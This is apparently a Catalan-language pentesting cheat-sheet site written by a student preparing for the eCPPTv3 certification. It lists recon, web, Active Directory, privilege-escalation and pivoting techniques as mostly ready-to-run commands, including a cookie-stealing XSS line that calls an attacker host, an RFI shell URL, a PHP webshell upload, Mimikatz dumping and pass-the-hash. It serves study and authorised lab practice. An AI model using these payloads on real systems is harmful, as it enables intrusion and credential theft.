Hackeja
amb Català
La teva guia completa en ciberseguretat i pentesting. Des de novell fins a professional, tot en català.
Metodologia General
El teu full de ruta per a qualsevol màquina
Diferències per Nivell
Easy: Recon → Exploit → Shell → Privesc → Root
Medium: Recon → Enum AD/Web → Credencials → Moviment lateral → Privesc
Hard: Recon → Bypass → Pivot → AD avançat/ADCS → DA
Full de Ruta Universal
1. Recon inicial
Escaneig complet de ports TCP amb Nmap. Mirar ports AD: 88, 389/636, 445, 135, 5985/5986, 3389.
2. Enumeració per servei
HTTP → mapes de rutes. SMB → comparticions. LDAP → usuaris, grups.
3. Cerca de credencials
Fitxers .txt, .config, .ini, .ps1, .bak... Comparticions SMB, scripts de login, GPP.
4. Accés inicial
Webshell via vulnerabilitats, WinRM, SSH, RDP, psexec.py / wmiexec.py
5. Post-explotació
Windows: whoami /all, systeminfo. Linux: id, sudo -l, SUID. Llançar WinPEAS/LinPEAS.
6. Active Directory
BloodHound, AS-REP roast, Kerberoast, secretsdump.py, Pass-the-Hash/Ticket.
Port Scanning amb Nmap
# Escaneig complet TCP ràpid ports=$(nmap -p- --min-rate=1000 -T4 $IP | grep ^[0-9] | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//') # Escaneig detallat nmap -sC -sV -p$ports $IP -oA scan # UDP essencial sudo nmap -sU --top-ports 200 $IP
Ports AD
53 DNS | 88 Kerberos | 135 RPC
389/636 LDAP | 445 SMB | 3389 RDP
5985/5986 WinRM | 3268 Global Catalog
Ports Web
80 HTTP | 443 HTTPS
8080/8443 HTTP Alt | 3000 Node.js
5000 Flask | 9000 PHP-FPM
Web Exploitation
Vulnerabilitats en aplicacions web
SQL Injection (SQLi)
Inserir codi SQL maliciós en consultes de bases de dades per llegir o modificar dades.
# Bypass autenticació ' OR '1'='1 ' OR 1=1 -- - admin'-- # UNION-based ' UNION SELECT NULL-- ' UNION SELECT 1,2,3-- ' UNION SELECT username,password FROM users--
# Detecció automàtica sqlmap -u "http://target.com/page.php?id=1" --dbs # Amb petició de Burp sqlmap -r login.req --batch --dump
Cross-Site Scripting (XSS)
Injectar JavaScript en pàgines visitades per altres usuaris.
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<script>document.location='http://atacant/steal?c='+document.cookie</script>SSTI (Server-Side Template Injection)
Injectar expressions en plantilles (Jinja2, Twig) per executar codi.
# Proves inicials
{{7*7}} → hauria de sortir 49
# RCE (Jinja2/Flask)
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}SSRF
Forçar el servidor a fer peticions a adreces internes.
# Metadata AWS http://169.254.169.254/latest/meta-data/ # Serveis interns http://localhost:8080/admin
LFI/RFI
Incloure fitxers no previstos (locals o remots).
# LFI ?page=../../../../etc/passwd # RFI ?page=http://atacant/shell.txt
Command Injection
# Separadors
8.8.8.8; whoami
8.8.8.8 && whoami
8.8.8.8 | whoami
$(whoami)
# Bypass espais
cat${IFS}/etc/passwdFile Upload
# Doble extensió evil.php.png # Magic bytes + codi GIF89a; <?php system($_GET['cmd']); ?>
Active Directory
Atacs al servei d'identitats de Microsoft
Active Directory emmagatzema usuaris, grups i polítiques. El Domain Controller (DC) autentica tots els usuaris del domini.
AS-REP Roasting
Atac contra comptes amb Pre-authentication deshabilitada.
# Obtenir hashes AS-REP GetNPUsers.py domini.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt # Crackejar hashcat -m 18200 asrep.txt rockyou.txt --force
Kerberoasting
Demanar tickets TGS per comptes amb SPN i crackejar-los offline.
# Obtenir TGS hashes GetUserSPNs.py domini.local/usuari:pass -dc-ip $DC -request -outputfile tgs.txt # Crackejar hashcat -m 13100 tgs.txt rockyou.txt --force
BloodHound
Visualitzar camins d'atac dins d'un AD complex.
# Recollida des de Kali bloodhound-python -d domini.local -u usuari -p 'pass' -ns $DC -c All --zip # SharpHound (Windows) SharpHound.exe -c All
Pass-The-Hash
# CrackMapExec cme smb $IP -u usuari -H NTLM_HASH # psexec psexec.py DOMINI/usuari@$IP -hashes :NTLM_HASH # evil-winrm evil-winrm -i $IP -u usuari -H NTLM_HASH
Dump de Credencials
# secretsdump.py secretsdump.py DOMINI/usuari:pass@$IP # Mimikatz (Windows) privilege::debug sekurlsa::logonpasswords
ADCS (Certipy)
Atacs contra Active Directory Certificate Services.
# Enumerar vulnerabilitats certipy find -u usuari -p 'pass' -dc-ip $DC -vulnerable # ESC1 - Demanar cert com admin certipy req -u usuari -p 'pass' -dc-ip $DC -ca NOM-CA -template PLANTILLA -upn administrator@domini.local # Autenticar certipy auth -pfx administrator.pfx -dc-ip $DC
Privilege Escalation
De usuari normal a root/SYSTEM
🐧 Linux Privilege Escalation
Checks Bàsics
id && whoami && hostname sudo -l uname -a cat /etc/passwd find / -perm -4000 -type f 2>/dev/null # SUID getcap -r / 2>/dev/null # Capabilities
SUID
# Si find té SUID find . -exec /bin/sh \; -quit # Consultar GTFOBins!
Sudo Abuse
sudo vim -c '!bash'
sudo python -c 'import os; os.system("/bin/bash")'Cron Jobs
cat /etc/crontab ls -la /etc/cron* # Buscar scripts modificables
PATH Hijacking
echo '/bin/bash' > /tmp/tar chmod +x /tmp/tar export PATH=/tmp:$PATH
🪟 Windows Privilege Escalation
Checks Bàsics
whoami /all hostname && systeminfo net user && net localgroup administrators
SeImpersonatePrivilege
Si tens aquest privilegi, pots impersonar SYSTEM!
whoami /priv PrintSpoofer.exe -i -c cmd GodPotato.exe -cmd "cmd /c whoami"
Unquoted Service Path
wmic service get name,pathname | findstr /i /v "c:\\windows"
AlwaysInstallElevated
reg query HKCU\...\Installer /v AlwaysInstallElevated
Eines Automàtiques
# LinPEAS / WinPEAS ./linpeas.sh .\winPEAS.exe # PowerUp Import-Module .\PowerUp.ps1 Invoke-AllChecks
Network Attacks
Explotar serveis de xarxa
Enumeració SMB (445)
# Llistar comparticions smbclient -L //$IP -N smbmap -H $IP # Connectar smbclient //$IP/SHARE -N smb: \> ls && get fitxer.txt # enum4linux enum4linux -a $IP # rpcclient rpcclient -U "" -N $IP rpcclient $> enumdomusers
Enumeració LDAP
# Usuaris actius ldapsearch -x -H ldap://$IP -D 'DOMINI\\usuari' -w 'PASS' \ -b "DC=domini,DC=local" "(objectClass=user)" sAMAccountName # Comptes amb SPN (Kerberoast) ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))"
Força Bruta amb Hydra
# SSH hydra -l admin -P passwords.txt ssh://$IP # FTP hydra -l admin -P passwords.txt ftp://$IP # HTTP POST hydra -L users.txt -P passes.txt $IP http-post-form \ "/login.php:user=^USER^&pass=^PASS^:F=error" # SMB hydra -l admin -P passwords.txt smb://$IP
DNS
# Transferència de zona dig axfr empresa.com @ns.empresa.com
SNMP
snmpwalk -v2c -c public $IP # Prova: public, private
Password Attacks
Força bruta i cracking
Online
Contra serveis en directe. Sorollosos i lents.
Offline
Quan ja tens el hash, crackeja localment.
Password Spraying
Una contrasenya contra molts usuaris (evita bloquejos).
# CrackMapExec cme smb $IP -u users.txt -p 'Summer2025!' --continue-on-success # Kerbrute (AD) kerbrute passwordspray --dc DC01 -d DOMINI users.txt 'Password123!'
Hashcat
# Modes comuns: # 0=MD5 | 100=SHA1 | 1000=NTLM | 1800=sha512crypt # 13100=Kerberos TGS | 18200=AS-REP # Diccionari hashcat -m 1000 hashes.txt rockyou.txt # Amb regles hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule # Força bruta hashcat -m 1000 hashes.txt -a 3 ?a?a?a?a?a?a
John the Ripper
john hashes.txt --wordlist=rockyou.txt john hashes.txt --format=NT john --show hashes.txt
Diccionaris
/usr/share/wordlists/rockyou.txt /usr/share/seclists/Passwords/ # Generar des d'un web cewl https://empresa.com -d 2 -m 5 -w wordlist.txt
Pivoting & Lateral Movement
Moure's per la xarxa interna
Pivoting: Usar un sistema compromès com a pont. Lateral Movement: Moure's entre màquines.
SSH Port Forwarding
# Local Port Forward # localhost:8000 → servidorIntern:3000 via pivot ssh -L 8000:172.16.0.10:3000 usuari@pivot # Remote Port Forward ssh -R 8080:localhost:80 usuari@pivot # Dynamic (SOCKS proxy) ssh -D 1080 usuari@pivot # Usar amb proxychains proxychains nmap -sT -Pn 172.16.0.10
Chisel
Tunneling sobre HTTP/WebSocket. Ideal per firewalls.
# Servidor (atacant) ./chisel server -p 8000 --reverse # Client (víctima) ./chisel client ATACANT:8000 R:1080:socks # Ara tens SOCKS5 a localhost:1080
Proxychains
# Configurar /etc/proxychains.conf socks5 127.0.0.1 1080 # Usar proxychains nmap -sT -Pn 10.0.0.0/24 proxychains curl http://10.0.0.5 proxychains evil-winrm -i 10.0.0.5 -u admin
Lateral Movement Windows
# Pass-the-Hash cme smb 10.0.0.10 -u usuari -H HASH --exec-method smbexec -x "whoami" psexec.py DOMINI/usuari@10.0.0.10 -hashes :HASH wmiexec.py DOMINI/usuari@10.0.0.10 -hashes :HASH evil-winrm -i 10.0.0.10 -u usuari -H HASH # RDP xfreerdp /v:10.0.0.10 /u:usuari /pth:HASH
Preparació eCPPTv3
Com em vaig preparar per la certificació
Què és l'eCPPTv3?
Durada: 24 hores contínues
Format: Laboratori pràctic + ~45 preguntes
Important: A la v3 NO hi ha informe formal
Estratègia d'Estudi
1. Màquines Pràctiques
- 5-10 màquines AD (HackTheBox/TryHackMe)
- 3-5 màquines web vulnerables
- 3-5 privesc Windows i Linux
2. Eines Preparades
- LinPEAS, WinPEAS descarregats
- PowerView, SharpHound llestos
- Reverse shells en diversos llenguatges
- Wordlists (rockyou, SecLists)
Estratègia 24 Hores
H1-2: Recon Global
Escaneig complet de tots els hosts. Anotar ports, serveis, vectors.
H3-10: Credencials i Accés
Prioritzar vectors que donin credencials: webs, SMB/LDAP, password spraying.
H10-20: Active Directory
AS-REP, Kerberoast, BloodHound. Moviment lateral. DOCUMENTAR TOT.
H20-24: Revisió
Verificar informació per respondre les 45 preguntes.
Consells Clau
✓ Enumera més del necessari
La informació és poder.
✓ Pensa en AD quan vegis ports 88/389/445
L'AD és el camí principal.
✓ Guarda TOTES les credencials
Reutilitza-les sempre.
✓ L'objectiu són les 45 preguntes
No només "arribar a DA".
Recursos Recomanats
• HackTheBox - Màquines AD i Windows
• TryHackMe - Paths de AD i Web
• HackTricks - La bíblia del pentesting
• PayloadsAllTheThings - Repositori de payloads
• GTFOBins - Escalada Linux
• LOLBAS - Living Off The Land (Windows)
🎉 El Resultat
La clau és practicar, documentar tot, i mantenir la calma durant les 24 hores. El pivoting a la v3 és més moderat, però has de saber fer port forwarding bàsic i túnels SSH.
Sobre Mi
Qui hi ha darrere d'aquesta guia
Fuct10n
Estudiant de Ciberseguretat
Hochschule Kaiserslautern
Qui sóc?
Estudiant d'Informàtica apassionat per la ciberseguretat i el pentesting. Vaig créixer a Catalunya i m'encanta compartir coneixement en català.
Aquesta guia neix de la meva pròpia experiència preparant-me per a la certificació eCPPTv3.
Per què aquesta guia?
Hi ha molt poc material de ciberseguretat en català. Volia crear quelcom que pogués ajudar a la comunitat catalanoparlant.
"Hackeja amb Català" és el meu aportament per fer el pentesting més accessible.
Interessos
- Pentesting i Red Team
- Desenvolupament d'apps
- Active Directory Security
- CTFs i màquines
Certificacions
- eCPPTv3 (en progrés)
- Estudis en Ciberseguretat
Tecnologies
- Kali Linux
- Metasploit, Burp Suite
- Python, Bash
- SwiftUI, React
Avís Legal
Tot el contingut és amb finalitats educatives. L'ús d'aquestes tècniques sense autorització és il·legal. Practica sempre en entorns controlats i amb permís. El pentesting ètic requereix consentiment per escrit.